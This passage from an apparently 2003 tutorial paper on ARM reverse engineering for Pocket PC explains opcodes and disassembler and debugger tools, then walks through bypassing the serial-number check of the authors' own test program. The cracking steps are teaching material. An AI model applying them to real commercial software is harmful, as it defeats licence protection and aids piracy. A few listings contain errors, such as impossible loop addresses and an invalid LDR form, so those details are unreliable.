BLEQ  BL if equal        BL if Z flag = 1   XX XX XX 0B
BLNE  BL if not equal    BL if Z flag = 0   XX XX XX 1B
Examples:
BL    AYGSHELL_34     7E 00 00 EB
BLEQ  mfcce300_699    5E 3E 00 0B
3.3.2.3 Move (MOV)
A program is constantly moving data around. To facilitate this, registers are updated with
values from other registers and with hard coded integers. These values will then be used
by other operations to make decisions or perform calculations. This is the purpose of the
MOV opcode.
MOV does just what its name implies; it moves information. In addition to basic moves,
this opcode also has the same conditional variants as the B and BL opcodes. However, by
this point you should have a general understanding of what the EQ/NE/etc. means to an
instruction, so it will not be discussed further. Note, almost every opcode includes some
form of a conditional variant.
It is important to understand how the MOV instruction works. This command can move
the value of one register into another, or it can move a hard coded value into a register.
However, you should note that the item receiving the data is always a register. The
following will list several examples of the MOV command, what it will do, and its hex
equivalent.
MOV R2, #1    01 20 A0 E3    Moves the value 1 into register 2
MOV R3, R1    01 30 A0 E1    Moves the value in R1 into R3
MOV LR, PC    0F E0 A0 E1    Moves the value of R15 into R14*
MOV R1, R1    01 10 A0 E1    Moves the value of R1 into R1**
* When a call is made to another function, the value of the PC register, which is the
current address location, needs to be stored into the Lr (R14) register. This is needed, as
previously mentioned, to hold the address to which the BL instruction will return.
** When RVEing, you will need ways to create a non-operation. The infamous NOP slide
using 0x90 will not work (as explained later). Instead, you will need to use the MOV
opcode to move a register's value into itself. Nothing is updated, and no flags are changed
when this operation is executed.
3.3.2.4 Compare (CMP)
In a program, a need often arises in which two pieces of information have to be
compared. The results of the comparison are used in numerous ways, from validation of a
serial number, to continuation of a counting loop. The assembler instruction that is
responsible for this is CMP.
The CMP operation can be used to compare the values in two registers with each other,
or a register value and a hard coded value. The results of the comparison do not output
any data, but they do change the status flags. As previously discussed, if the two values
are equal, the Zero flag is set to 1; if the values are not equal, the flag is set to 0. This
Zero value is then used by a following opcode to control how or what is executed.
The CMP operation is used in almost every serial number validation. This is
accomplished in two ways. The first is the actual check of the entered serial number with
a hard coded serial number, which can also be done using system functions (i.e. strcmp).
The second is used after the validation check when the program is deciding what piece of
code is to be executed next. Typically, there will be a BEQ or BNE operation that uses
the status of the Zero flag to either send a 'Wrong Serial Number' message to the screen
or to accept the entered serial and allow access to the protected program. This use of the
CMP operation will be discussed further in the example part of this paper.
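To make the pattern concrete, a hypothetical serial check of this kind might look like the following C fragment; the function name is invented, though the hard coded serial matches the example program used later in this paper. It compiles down to essentially the wcslen/CMP and wcscmp/flag-test sequences dissected in section 5.

    #include <wchar.h>

    int check_serial(const wchar_t *entered)
    {
        if (wcslen(entered) != 8)                  /* becomes CMP R0, #8 + branches */
            return 0;
        return wcscmp(entered, L"12345678") == 0;  /* becomes BL wcscmp + flag test */
    }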
Another use of the CMP is in a loop function. These are very common because they are
used to assist in counting, string comparisons, file loads, and more. As a result, being able
to recognize a loop in a sequence of assembler programming is an important part of
successfully reverse engineering. The following will provide you with an example of how
a loop looks when debugging a program.
00002AEC    ADD  R1, R4, R7
00002AF0    MOV  R0, R6
00002AF4    BL   sub_002EAC
00002AF8    ADD  R5, R5, #20
00002AFC    ADD  R2, R5, #25
00002A00    CMP  R3, R2
00002A04    BEQ  loc_002AEC
This is a simple loop included in an encryption scheme. In memory address 2A04 you
can see a Branch occurs if the Zero flag is set. This flag is set, or unset, by the CMP
operation at memory address 2A00, which compares the values between R3 and R2. If
the values match, the code execution will jump back to memory address 2AEC.
The following is an example of two CMP opcodes and their corresponding hex values.
CMP R2, R3    03 00 52 E1
CMP R4, #1    01 00 54 E3
3.3.2.5 Load/Store (LDR/STR)
While the registers are able to store small amounts of information, the processor must
access the space allotted to it in the RAM to store larger chunks of information. This
includes screen titles, serial numbers, colors, settings, and more. In fact, most everything
that you see when you use a program has at one time resided in memory. The LDR and
STR opcodes are used to write and read this information to and from memory.
While related, these two commands do opposite actions. The LDR instruction loads data
from memory into a register and the STR instruction stores data from a
register into memory for later usage. However, there is more to these instructions than the
simple transfer of data. In addition to defining where the data is moved, the LDR/STR
commands have variations that tell the processor how much data is to be moved. The
following is a list of these variants and what they mean.
LDR/STR: Move a word's (four bytes') worth of data to or from memory.
LDRB/STRB: Move a byte's worth of data to or from memory.
LDRH/STRH: Move two bytes' (a halfword's) worth of data to or from memory.
LDR/STR commands are different from the other previously discussed instructions in
that they almost always have three pieces of information included with them. This is due
to the way in which the load and store instructions work. Since only a few bytes of data
are moved at best, the program must keep track of where it was last writing to or reading
from. It must then append to or read from where it left off at the last read/write. For this
reason, you will often find LDR/STR commands in a loop where they will read in or
write out large amounts of data, one byte at a time.
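For example, a copy routine as simple as the following C loop is typically compiled into an LDRB/STRB pair inside a loop, with the write-back addressing modes shown below keeping both pointers current; the function name is invented for illustration.

    /* Copies n bytes; each iteration becomes roughly
       LDRB R3, [R1], #1 followed by STRB R3, [R0], #1 on ARM. */
    void copy_bytes(unsigned char *dst, const unsigned char *src, unsigned n)
    {
        while (n--)
            *dst++ = *src++;
    }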
The LDR/STR instructions are also different from other instructions in that they typically
have three variables controlling where and what data is manipulated. The first variable is
the data that is actually being transferred. The second and third determine where the data
is written, and if it is manipulated before it is permanently stored or loaded. The following
lists several examples of how these instructions are used.
STR R1, [R4, R6]          Store R1 at R4+R6
STR R1, [R4, R6]!         Store R1 at R4+R6 and write R4+R6 back into R4
STR R1, [R4], R6          Store R1 at R4, then write R4+R6 back into R4
STR R1, [R4, R6, LSL#2]   Store R1 at R4+(R6*4) (LSL discussed next)
LDR R1, [R2, #12]         Load R1 with the value at R2+12
LDR R1, [R2, R4, R6]      Load R1 with the value at R2+R4+R6
While this provides a good example of how the LDR/STR are used, you should have
Page 16 of 16 © 2003 Airscanner™
Corp. http://www.Airscanner.com
noted two new items that impacted how the opcode performed. The first is the “!”
character that is used to tell the instruction to write back the new information into one of
the registers. The second is the use of the LSL command, which is discussed following
this segment.
Also related to these instructions are the LDM/STM instructions. These are also used to store
or load register values, only they do it on a larger scale. Instead of just moving one value,
like LDR/STR, the LDM/STM instructions store or load ALL the specified register values. This is
most commonly used when a BL occurs. When this happens, the program must be able to
keep track of the original register values, which will be overwritten with values used by
the BL code. So, the STM opcode is used to store key registers onto the stack memory,
and when the branched code has completely executed, the original register values are
loaded back into the registers from memory using the LDM opcode. See the following
chunk of code for an example.
STMFD SP!, {R4,R5,LR}
MOV   R0, R4
; ...more code...
LDMFD SP!, {R4,R5,LR}
In this example, R4, R5, and the LR values are placed into memory using the stack
pointer address, which is then updated with the new memory address to account for the
growth of the stack. At the end of the algorithm, R4, R5, and LR are loaded back from
the stack pointer, which is again updated, and the program execution continues.
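To see why compilers emit these pairs, consider the following hypothetical C fragment. Because caller() keeps a value alive across a call, the compiler must preserve a register and the return address, roughly as in the STMFD/LDMFD example above.

    int helper(int a)
    {
        return a * 2;
    }

    int caller(int x)           /* entry: roughly STMFD SP!, {R4,LR}  */
    {
        int saved = x + 1;      /* may live in R4 across the call     */
        return helper(saved);   /* the BL that forces the save        */
    }                           /* exit:  roughly LDMFD SP!, {R4,LR}  */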
You should be getting slightly confused at this point. If you are not, then you probably
have had previous experience with assembler, or are just a born programmer. Don't be
discouraged if you are feeling overwhelmed, for learning how to program in assembler
typically takes months of dedicated study. Fortunately, in the case of reverse engineering,
you don't have to know how to program, but just need to be able to figure out what a
program is doing.
3.3.2.6 Shifting
The final instruction sets we will look at are the shifting operations. These are somewhat
complicated, but a fundamental part of understanding assembler. They are used to
manipulate data held by a register at the binary level. In short, they shift the bit values left
or right (depending on the opcode), which changes the value held by the register. The
following illustrates how this works with the two most common shift instructions:
LSL and LSR. For the sake of space, we will only be performing shifts on bits 0-7 of a 32
bit value.
LSL: Logical Shift Left – Shift the binary values left by x number of places, using zeros
to fill in the empty spots.
LSR: Logical Shift Right – Shift the 32 bit values right by x number of places, using
zeros to fill in the empty spots.
While these are the most common shift instructions, there are three others that you may
see. They are Arithmetic Shift Left (ASL), Arithmetic Shift Right (ASR), and Rotate
Right (ROR). All of these shift operations perform the same basic function as
LSL/LSR, with some variations on how they work. For example, the ASR shift fills
in the empty bit places with the value of bit 31. This is used to preserve the sign
bit of the value being held in the register. The ROR shift, on the other hand, carries the
bit value around from bit 0 to bit 31.
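In C terms, LSL and LSR correspond to the << and >> operators on unsigned values, and ASR to >> on signed values (on compilers that implement signed right-shift arithmetically, which is virtually all of them). A small sketch:

    #include <stdio.h>
    #include <stdint.h>

    int main(void)
    {
        uint32_t x = 3;               /* binary 0011                  */
        printf("%u\n", x << 2);       /* LSL #2 -> 12 (binary 1100)   */
        printf("%u\n", 48u >> 3);     /* LSR #3 -> 6  (binary 0110)   */
        int32_t s = -8;
        printf("%d\n", s >> 1);       /* ASR #1 -> -4, sign preserved */
        return 0;
    }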
3.4 Summary
The previous pages have given you an inside look at the assembler programming
language. You will need this information later in this paper when we practice some of our
RVE skills on a test program. This information is invaluable to you as you attempt to
debug software, looking for holes and security risks.
4 Reverse-Engineering Tools
Reverse engineering software requires several key tools. Each tool allows its user to
interact with the target program in one specific way, and without these tools the reverse
engineering process can take much longer. The following is a breakdown of the types of
tools, and an example of each.
4.1 Hex Editor
As previously described, all computer data is processed as binary code. However, this
code is rather difficult for the human eye to follow, which led to the creation of hex.
Using the numbers 0-9 and the letters A-F, any eight-digit binary value can be
quickly converted to a one- or two-character hex value, and vice versa.
While it is important that a hex editor can convert the program file to its hex equivalent,
what is more important is that a hex editor allows a user to easily alter the hex code to
new values. In addition to basic manipulation, some hex editors also provide search tools,
ASCII views, macros and more.
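In fact, everything a hex editor does to a file can be reduced to a seek and a write. The following C sketch patches a single byte at a given offset; the function name, path, and offset are placeholders, not part of any tool described here.

    #include <stdio.h>

    /* Overwrite one byte of a binary file in place. */
    int patch_byte(const char *path, long offset, unsigned char value)
    {
        FILE *f = fopen(path, "r+b");
        if (!f)
            return -1;
        if (fseek(f, offset, SEEK_SET) != 0) { fclose(f); return -1; }
        fwrite(&value, 1, 1, f);
        fclose(f);
        return 0;
    }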
UltraEdit-32
UltraEdit-32 is a Windows-based hex-editing program that does all of the above and more.
As you can see from figure 2, UltraEdit-32 contains the three basic, but very necessary,
fields required to edit hex code. The memory address on the left is used to locate the
particular characters that you want to change. This address will be provided by the
disassembler, which is discussed next. Once the correct line is located, the next step is to
find the hex code in the line that represents the information you want to alter. The ASCII
view, which is not always necessary, can provide some interesting and useful
information, especially if you are changing plain-text information in a file.
Figure 2: UltraEdit-32 screen shot
4.2 Disassemblers
While it would be possible for a person to reverse-engineer a program as it exists in
hex format, it would be very difficult and would require a very deep understanding of hex
and binary code. Since this level of knowledge is impractical, the concept of the
disassembler was designed to help us humans find a workable method of communicating
with a computer.
As we previously discussed, there are several levels of languages. The upper languages
like Visual Basic are easy to follow and program with. This is because the syntax of the
language follows spoken language. Unfortunately, a computer cannot directly understand
upper level languages. So, after a program is written, it is compiled, or rewritten using
code a computer can understand. This code, while it actually exists as hex or binary, can
easily be converted to a low level language known as assembler.
Assembler code is relatively basic, once you understand it. While the syntax is different
for each processor type (e.g. RISC, Intel, Motorola), the general commands are relatively
the same. Using a set of opcodes, assembler controls the processor and how it interacts
with RAM and other parts of the computer. In other words, assembler speaks to the heart
and nervous systems of the computer.
Once a program is compiled, it creates a hex file (or set of files) that the computer loads
into memory and reads. As previously mentioned, this code is stored as hex, but is
converted to its binary equivalent and then processed by the computer. To facilitate human
understanding, a disassembler takes the same hex file and converts it to assembler code.
Since there is no real difference, other than format and appearance, a person can use the
assembler code to see the path the program takes when it is executed. In addition, a good
disassembler will also provide the user with the information they need to alter the
assembler code, through the use of a hex editor. By researching the code, a hacker can
find the point in the program, for example, that a serial number is checked. They could
then look up the memory location, and use the hex editor to remove the serial number
check from the program.
IDA Pro
By far, IDA Pro (The Interactive Disassembler) is one of the best disassembler programs
on the market. In fact, “IDA Pro was a 2001 PC Magazine Technical Excellence
Award Finalist, defeated only by Microsoft and its Visual Studio .NET”, according to
their web site. While there are many other disassemblers available, some for free, this
program does a marvelous job providing its user with a wide selection of supported
processor types, and a plethora of tools to assist in disassembling.
While we could spend an entire paper delving into the many features and functionality of
this program, it is outside the scope of this paper. However, there are several key features
that need to be outlined.
The first feature is that this program supports more processors than any other
disassembler, and the list keeps growing. In other words, you can disassemble everything
from the processor used in an iPAQ to your desktop computer. In addition to this, IDA
includes several proprietary features that help to identify many of the standard function
calls made in a program. By providing this information, you do not have to track the code
to the function yourself. Another proprietary feature is the incorporation of a C-like
programming language that can be used to automate certain routines, such as decryption.
However, it is the ease of use and the amount of information provided by IDA Pro that
make it a great program. As you can see in figure 3, IDA Pro provides a wealth of
information, more than can fit in one screen shot. However, in this one shot, you can see that
IDA has located the functions that are being called, and used their names in place of the
memory addresses that would normally exist. In addition, you can see that IDA has listed
all the window names, and provides a colorful look at how the data is laid out in the
memory. In IDA 4.21+, the program also provides a graphical diagram of how functions
are tied together.
Figure 3: IDA Pro screen shot.
4.3 Debuggers
The debugger is the third major program in any reverse-engineer's bag of tools. This
program executes the code live and lets the reverse-engineer watch the
action in real time. Using such a tool, a reverse-engineer can monitor the register values,
status flags, modes, etc. of a program as it executes. In addition, a good debugger will
allow the user to alter the values being used by the program. Memory, registers, status
flags and more can be updated to control the direction of the program's execution. This
type of control can reduce the amount of time a user has to spend working with raw
assembler code.
Due to the limited environment of the PPC platform, and in particular the Pocket PC OS,
there are few choices for a debugger. In fact, there is really only one that actually debugs
live on the PPC device. This debugger is free and is actually included with the SDK from
Microsoft. To obtain it, go to www.microsoft.com and download eMbedded Visual Tools.
This will come with VB and VC++ for the Pocket PC OS. While these are programming
tools, the VC++ includes a debugger that is ready for action (see Figure 4).
Figure 4: EVC debugger
We will be demonstrating how this program works in the next section, but the following is a
list of pointers to help you get started.
• To get connected to a program on the PPC, first copy it to the PC and open it from
the local computer.
• The debugger will copy the file BACK over to the PPC device, so be sure to
define where you want the file to go (Project Settings).
• It is best to launch the program using the F11 key. This is the ‘Step into’ function
and will only load the program and place the pointer at the first line of actual
code. If you use the Run command, you will execute the program as it would
normally execute, which could make it difficult to break cleanly at the point you
want to debug.
• Make extensive use of breakpoints (Alt-F9)
• Use your disassembler to determine the relative address, which corresponds to the
actual address in the debugger.
• If all else fails, use the break option at the top. However, note that this will force a
complete reload of your program for further debugging.
In summary, a debugger is not necessary, but is so helpful that it really should be used.
Debugging on the PPC platform is painfully slow if you use the standard USB/serial
connection that provides the default HotSync connection. If you want much faster access
and response time, take the time to configure your PPC device to sync up over a network
connection.
5 Practical Reverse-Engineering
Reverse engineering is not a subject that can be learned by simple reading. In order to
understand the intricacies involved, you must practice. This segment will provide a legal,
hands-on tutorial on how to bypass a serial protection. This will only describe one
method of circumvention, of only one protection scheme, which means there is more than
one 'right' way to do it. We will use information previously discussed as a foundation.
5.1 Overview
For our example, we will use our own program. This program was written in Visual C++
to provide you with a real working product to test and practice your newly acquired
knowledge. Our program simulates a simple serial number check that imitates those of
many professional programs. You will see firsthand how a cracker can reverse-engineer
a program to allow any serial number, regardless of length or value.
5.2 Loading the target
The first step in reverse-engineering a program requires you to tear it apart. This is
accomplished via a disassembler program, one of which is IDA Pro. There are many
other disassemblers available; however, IDA Pro has earned the respect of both
legitimate debuggers and crackers alike for its simplicity, power, and versatility.
To load the target into the disassembler, work through the following steps.
1. Open IDA (click OK through splash screen)
2. Click [New] button at Welcome screen and select test.exe from hard drive, then click
[Open]
3. Check the 'Load resources' box, change the Processor type drop-down menu to ARM
processors: ARM and click [OK], as illustrated by figure 5.
4. Click [OK] again if prompted to change processor type.
Figure 5: IDA Pro loading screen
5. Locate any requested *.dll file and wait for IDA to disassemble the program.
Note: You will need to find the requested files on the Windows CE device and transfer
them over to a local folder on your PC. This will allow IDA to fully disassemble the
program. The disassembly of serial.exe will require mfcce300.dll and olece300.dll.
Other programs may require different *.dll files, which can be found online or on the
PPC device.
5.3 Practical Disassembly
Once the program is open, you should see a screen similar to figure 6. This screen is the
default disassembly view, which shows you the program fully disassembled. On the left
side of the window, you will see a “.text: ########” column that represents the memory
address of the line. The right side of the window holds the disassembled code, which is
processed by the PPC device.
Figure 6: IDA Pro
In addition to the data on the default screen, you have access to several other important
pieces of information, one of the most helpful of which is the Names window. This dialog
window provides you with a listing of all the functions used by the program. In many
ways, this is a bookmark list that can be used to jump to a particular function or call that
could lead to a valuable piece of code. In this window you will find names such as,
LoadStringW, MessageboxW, wcscmp, wcslen, and more. These are flares to reverse-
engineers because they are often used to read in serial numbers, popup a warning,
compare two strings, or check the length to be sure it is correct. In fact, some programs
call their functions by VERY obvious names, such as ValidSerial or SerialCheck. These
programs might as well include a crack with the program for all the security they have.
However, it is also possible to throw a cracker off track by using this knowledge to
misname windows. Imagine if a program threw in a bogus serial check that only resulted
in a popup window that congratulated the cracker on their fine job!
5.4 Locating a Weakness
From here, a cracker basically has to start digging. While our serial.exe is basic, we can
see that the Names window offers us a place to start. If you scroll through the
many names, you will eventually come to the wcscmp function, as illustrated in figure 7.
If you recall, this function is used to compare two values together. To access the point in
the program where the wcscmp function is located, double click on the line.
Figure 7: Locating wcscmp in Names window
Once the IDA disassembly screen moves to the wcscmp function, you should take note of
a few items. The first is that this function is an imported function from a supporting .dll
(coredll.dll in this case); the second item to notice is the part of the data that is circled in
figure 8. At each function, you will find one or two items listed at the top right corner.
These list the addresses in the program where the function is used. Note, if there are three
dots to the right of the second address listing, this means the function is used more than
twice. To access the list of addresses, simply click on the dots. In larger programs, a
wcscmp function can be called tens, if not hundreds of times. However, we are in luck,
the wcscmp function in serial.exe is only referenced once. To jump to that part of the
disassembled program, double click on the address. Once the IDA screen refreshes itself
with the location of the selected address, it is time to start rebuilding the program.
Figure 8: Viewing wcscmp function call in IDA
5.5 Reverse-Engineering the Algorithm
Since serial.exe is a relatively simple program, all the code we will need to review and
play with is located within a few lines. They are as follows:
.text:00011224 MOV R4, R0
.text:00011228 ADD R0, SP, #0xC
.text:0001122C BL CString::CString(void)
.text:00011230 ADD R0, SP, #8
.text:00011234 BL CString::CString(void)
.text:00011238 ADD R0, SP, #4
.text:0001123C BL CString::CString(void)
.text:00011240 ADD R0, SP, #0x10
.text:00011244 BL CString::CString(void)
.text:00011248 ADD R0, SP, #0
.text:0001124C BL CString::CString(void)
.text:00011250 LDR R1, =unk_131A4
.text:00011254 ADD R0, SP, #0xC
.text:00011258 BL CString::operator=(ushort)
.text:0001125C LDR R1, =unk_131B0
.text:00011260 ADD R0, SP, #8
.text:00011264 BL CString::operator=(ushort)
.text:00011268 LDR R1, =unk_131E0
.text:0001126C ADD R0, SP, #4
.text:00011270 BL CString::operator=(ushort)
.text:00011274 LDR R1, =unk_1321C
.text:00011278 ADD R0, SP, #0
.text:0001127C BL CString::operator=(ushort)
.text:00011280 MOV R1, #1
.text:00011284 MOV R0, R4
.text:00011288 BL CWnd::UpdateData(int)
.text:0001128C LDR R1, [R4,#0x7C]
.text:00011290 LDR R0, [R1,#-8]
.text:00011294 CMP R0, #8
.text:00011298 BLT loc_112E4
.text:0001129C BGT loc_112E4
.text:000112A0 LDR R0, [SP,#0xC]
.text:000112A4 BL wcscmp
.text:000112A8 MOV R2, #0
.text:000112AC MOVS R3, R0
.text:000112B0 MOV R0, #1
.text:000112B4 MOVNE R0, #0
.text:000112B8 ANDS R3, R0, #0xFF
.text:000112BC LDRNE R1, [SP,#8]
.text:000112C0 MOV R0, R4
.text:000112C4 MOV R3, #0
.text:000112C8 BNE loc_112F4
.text:000112CC LDR R1, [SP,#4]
.text:000112D0 B loc_112F4
.text:000112E4
.text:000112E4 loc_112E4 ; CODE XREF: .text:00011298
.text:000112E4 ; .text:0001129C
.text:000112E4 LDR R1, [SP]
.text:000112E8 MOV R3, #0
.text:000112EC MOV R2, #0
.text:000112F0 MOV R0, R4
.text:000112F4
.text:000112F4 loc_112F4 ; CODE XREF: .text:000112C8
.text:000112F4 ; .text:000112D0
.text:000112F4 BL CWnd__MessageBoxW
If you have not touched anything after IDA placed you at address 0x000112A4, then that line
should be highlighted blue. If you want to go back to the last address, use the back arrow
at the top of the window or hit the ESC key.
Since we want to show you several tricks crackers will use when extracting or bypassing
protection, let's start by considering what we are viewing. At first glance at the top of our
code, you can see there is a pattern. A string value appears to be loaded in from program
data, and then a function is called that does something with that value. If we double click
on unk_131A4, we can see that the first value is “12345678”, or our serial number.
While our serial.exe example is simplified, the fact remains that any data used in a
program's validation must be loaded in from the actual program data and stored in RAM.
As our example illustrates, it doesn't take much to discover a plain-text serial
number. In addition, it should be noted that any hex editor can also be used to find this
value, though it may be difficult to parse out a serial number from the many other
character strings that are revealed in a hex editor.
As a result of this plain text problem, many programmers build an algorithm into the
program that deciphers the serial number as it is read in from memory. This will typically
be indicated by a BL to the memory address in the program that handles the
encryption/algorithm. An example of another method of protection is to use the device
owner's name or some other value to dynamically build a serial number. This completely
avoids the problems surrounding storing it within the program file, and indirectly adds an
extra layer of protection on to the program. Despite efforts to create complex and
advanced serial number creation schemes, the simple switch of a 1 to a 0 can nullify
many anti-piracy algorithms, as you will see.
The remaining code from 0x00011250 to 0x0001127C is also used to load in values from
program data to the device's RAM. If you check the values at the address references, you
can quickly see that there are three messages that are loaded into memory as well. One is
a 'Correct serial' message, and the other two are 'Incorrect serial' messages. Knowing that
there are two different messages is a minor, but important tidbit of information because it
tells us that failure occurs in stages or as a result of two different checks.
Moving on through the code, we can see that R1 is loaded with some value out of
memory, which is then used to load another value into R0. After this, in address
0x00011294, we can see that R0 is compared to the number eight (CMP R0,8). The next
two lines then check the results of the comparison, and if it is greater than or less than
eight the program jumps to loc_112E4 and continues from there.
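Read back into C, the BLT/BGT pair is simply the compiler splitting a 'not equal to eight' test into two conditional branches. A plausible reconstruction (names invented) is:

    int length_ok(int len)
    {
        if (len < 8) return 0;   /* BLT loc_112E4 */
        if (len > 8) return 0;   /* BGT loc_112E4 */
        return 1;                /* fall through to the wcscmp call */
    }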
If we follow loc_112E4 in IDA Pro, it starts to get a bit more difficult to determine what
is happening. This brings us to the second phase of the reverse-engineering process: the
live debugger.
5.6 Practical Debugging
Currently, the best debugger for the Pocket PC operating system is Microsoft's eMbedded
Visual C++ program (MVC). This program is part of the Microsoft eMbedded Visual Tools
package, which is currently free of charge. Once you download it from Microsoft, or a
mirror, install it and open eMbedded Visual C++ (MVC). For the rest of our example, we
will be using the serial.exe program currently being dissected by IDA Pro. You will need
to have your Pocket PC device plugged in and connected to your PC to do live
debugging. This can be accomplished using the traditional USB/serial connection, which
is very slow, or using a network (wired or wireless) based sync connection that is 100x
faster. Use the following instructions to get serial.exe loaded into the MVC.
1. Obtain a working connection between the PPC and the computer running the MVC.
2. Start up the MVC.
3. Click the Open folder.
4. Switch Files of type: to Executable Files (.exe; .dll; .ocx).
5. Locate serial.exe and click Open.
Note: Depending on the program you are loading, you may need to adjust the
download directory under Project -> Settings -> Debug tab -> Download Directory.
This tells the MVC to send a copy of the file to that directory on the Pocket PC, which
may be necessary if the program has its own .dlls. Since serial.exe is a one-file
program, this setting doesn't matter.
6. Hit the F11 key to execute serial.exe on the Pocket PC and load up the disassembly
information.
7. You will see a connecting dialog box, which should be followed by a CPU mismatch
warning. Click Yes on this warning and the next one. This warning is due to the fact
that you loaded the MVC with a local copy of serial.exe, and the CPU for your local
system doesn't match the Pocket PC device.
8. Click OK for the '...does not contain debugging information.' alert.
9. Click Cancel on the .dll requests. For serial.exe you will not need these two dll files.
However, this is not always the case.
You should now be staring at a screen that looks remarkably similar to IDA Pro. The first
thing you will want to do is set a breakpoint at the address location in serial.exe that
corresponds to the location of the previously discussed segment of code (e.g.
0x00011280). However, you should take a moment and look at the address column in the
MVC. As you will quickly see, IDA Pro's memory addresses and the MVC's do not
exactly match.
5.7 Setting Breakpoints
This is because IDA provides a relative address, meaning it will always start at 0. In the
MVC, you will be working with an absolute address, which is based on actual memory
location, not the allocated memory address as in IDA. However, with the exception of the
first two numbers, the addresses will be the same. Therefore, take note of the address block
that serial.exe has loaded, and set the breakpoint with this value in mind. For example, if
the first address in the MVC is 0x2601176C, and the address you found in IDA is
0x00011280, the breakpoint should be set at 0x26011280, which is exactly what we need to
do in our example.
Setting a breakpoint is simple: click Edit Breakpoints or hit Alt-F9. In the
breakpoint window set the breakpoint at '0x26011280', with any changes as defined by
the absolute memory block. Once the breakpoint is entered, hit the F5 key to execute the
program. You should now see a serial screen on your Pocket PC similar to figure 9. Enter
any value in the Pocket PC and hit the Submit button.
Figure 9: Serial.exe default screen
Soon after you click the Submit button, your PC should shift and focus on the section of
code that we looked at earlier in IDA. You should note a little yellow arrow on the left
side of the window pointing to the address of the breakpoint. At this time, right click on
the memory address column and note the menu that appears. You will learn to use this
menu quite frequently when debugging a program.
NOTE: The MVC is very slow when it is in execution mode if using a USB/serial
connection. If you are in the habit of jumping between programs, you will quickly
become frustrated at the time required for the MVC to redraw the screen. To avoid this,
ensure the MVC is in break mode before changing window focus.
Before continuing, you should familiarize yourself with the various tools provided by the
MVC. In particular, there are several windows you will want open while debugging.
These are accessed by right-clicking on the toolbar area at the top of the MVC. The three
of interest are as follows:
Registers: This window lets you see the current values held by the registers. This is very
useful because you can watch the registers update as the program executes.
Memory: The memory window lets you look directly in the RAM being used by the
program. This is useful because the registers will often point to a memory location at
which a value is being held.
Call Stack: This window lets you see the task list of the program and allows you to
decipher some of the abstract commands and branches that occur in a program.
5.8 Step-through Investigation
At this point, serial.exe is loaded on the Pocket PC and the MVC is paused at a
breakpoint. The next command the processor is to execute is “MOV R1, #1”. From our
previous discussion on the ARM opcodes, we know that this is a simple command to
move the value 1 into register 1 (R1).
Before executing this line, look at the register window and note the value of R1. You
should also note that all the register values are red. This is because they have all changed
from the last time the program was paused. Next hit the F11 key to execute the next line
of code. After a short pause, the MVC will return to pause mode, at which point you
should note several things. The first is that most of the register values turned to black,
which means they did not change values. The second is that R1 now equals 1.
The next line loads the R0 register with the value in R4. Once again, hit the F11 key to let
the program execute this line of code. After the brief pause, you will see that R0 is equal
to R4. Step through a few more lines of code until your yellow arrow is at address
0x00011290. At this point let's take a look at the Register window.
The last line of code executed was an LDR command that loaded a value (or address
representing the value) from memory into a register. In this case, the value was loaded
into R1, which should be equal to 0006501C. Locate the Memory window and enter the
address stored by R1 into the Address: box. Once you hit enter, you should be staring at
the serial number you entered.
After executing the next line, we can see that R0 is given a small integer value. Take a
second and see if you can determine its significance...OK, enough time. In R0, you
should have a value equal to the number of characters in the serial you entered. In other
words, if you entered “777”, the value of R0 should be three, which represents the
number of characters you entered.
The next line, “CMP R0, 8”, is a simple comparison opcode. When this opcode is
executed, it will compare the value in R0 with the integer 8. Depending on the results of
the comparison, the status flags will be updated. These flags are conveniently located at
the bottom of the Registers window. Note their values and hit the F11 key. If the values
change to N1 Z0 C0 O0, your serial number is not eight characters long.
At this point, serial.exe is headed for a failure message (unless you happened to enter
eight characters). The next two lines of code use the results of the CMP check to
determine if the value is less than or greater than eight. If either is true, the program will
jump to address 0x000112E4 where a message will be displayed on the screen. If you
follow the code, you will see that address 0x000112E4 contains the opcode “LDR R1,
[SP]”. If you follow this through and check the Memory address after this line executes,
you will see that it points to the start of the following error message at address
0x00065014, “Incorrect serial number. Please verify it was typed correctly.”
5.9 Abusing the System
Now that we know the details of the first check, we will want to break the execution and
restart the entire program. To do this, perform the same steps that you previously worked
through, but set a breakpoint at address 0x00011294 (CMP R0, #8). Once the program is
paused at the CMP opcode, locate the Register window and note the value of R0. Now,
place your cursor on the value and overwrite it with '00000008'. This very handy function
of the MVC will allow you to trick the program into thinking your serial is eight
characters long, thus allowing you to bypass the check. While this works temporarily, we
will need to make a permanent change to the program to ensure any value is acceptable at
a later point.
After the change is made, use the F11 key to watch serial.exe execute through the next
couple lines of code. Continue until the pointer is at address 0x000112A4 (BL
00011754). While this command may not mean much to you in the MVC, if we jump
back over to IDA Pro we can see that this is a function call to wcscmp, which is where
our serial is compared to the correct serial. Knowing this, we should be able to take a
look at the Registers window and determine the correct serial.
NOTE: Function calls that require data to perform their operation use the values held by
the registers. In other words, wcscmp will compare the value of R0 with the value of R1,
which means we can easily determine what these values are. It will then return the result
in R0 (zero when the strings match).
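For reference, here is the standard wcscmp behavior in a tiny self-contained C example; the register names in the comment follow the ARM calling convention described in the NOTE above.

    #include <stdio.h>
    #include <wchar.h>

    int main(void)
    {
        /* wcscmp returns 0 when the strings match; on ARM the two pointer
           arguments arrive in R0 and R1 and the result comes back in R0. */
        int r0 = wcscmp(L"12345678", L"12345678");
        printf("%d\n", r0);   /* prints 0: the serials match */
        return 0;
    }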
If we look at R0 and R1, we can see that they hold the values 00064E54 and 0006501C,
respectively, as illustrated by figure 10 (these values may be different for your system).
While these values are not the actual serial numbers, they do represent the location in
memory where the two serials are located. To verify this, place R1's value in the Memory
window's address field and hit enter. After a short pause, the Memory window should
change and you should see the serial number you entered. Next, do the same with the
value held in R0. This will cause your Memory window to change to a screen similar to
figure 11 where you should see the value '1.2.3.4.5.6.7.8', or in other words, the correct
serial.
Figure 10: Registers window
Figure 11: Using Memory window
At this point a cracker could stop and simply enter the newfound value to gain full access
to the target program, and then spread that serial number around. However, most serial
validations include some form of dynamically generated serial number (based off of time,
name, or matching registration key), which means any value determined by viewing it in
memory will only work for that local machine. As a result, crackers will often note the
serial number, and continue on to determine where the program can be 'patched' to bypass
the protection regardless of any dynamic serial number.
Moving on through the program, we know the wcscmp function will compare the values
held in memory, which will result in an update to the condition flags and R0–R3 as
follows.
R0: If serials are equal, R0 = 0, else R0 = 1.
R1: If equal, address following entered serial number, if not equal, address of failed
character.
R2: If equal then R2=0, else hex value of failed character.
R3: If equal then R3=0, else hex value of correct character.
Therefore, we need to once again trick the program into believing it has the right serial
number. This can be done one of two ways. The first method you can use is to actually
update your serial number in memory. To do this, note the hex values of the correct serial
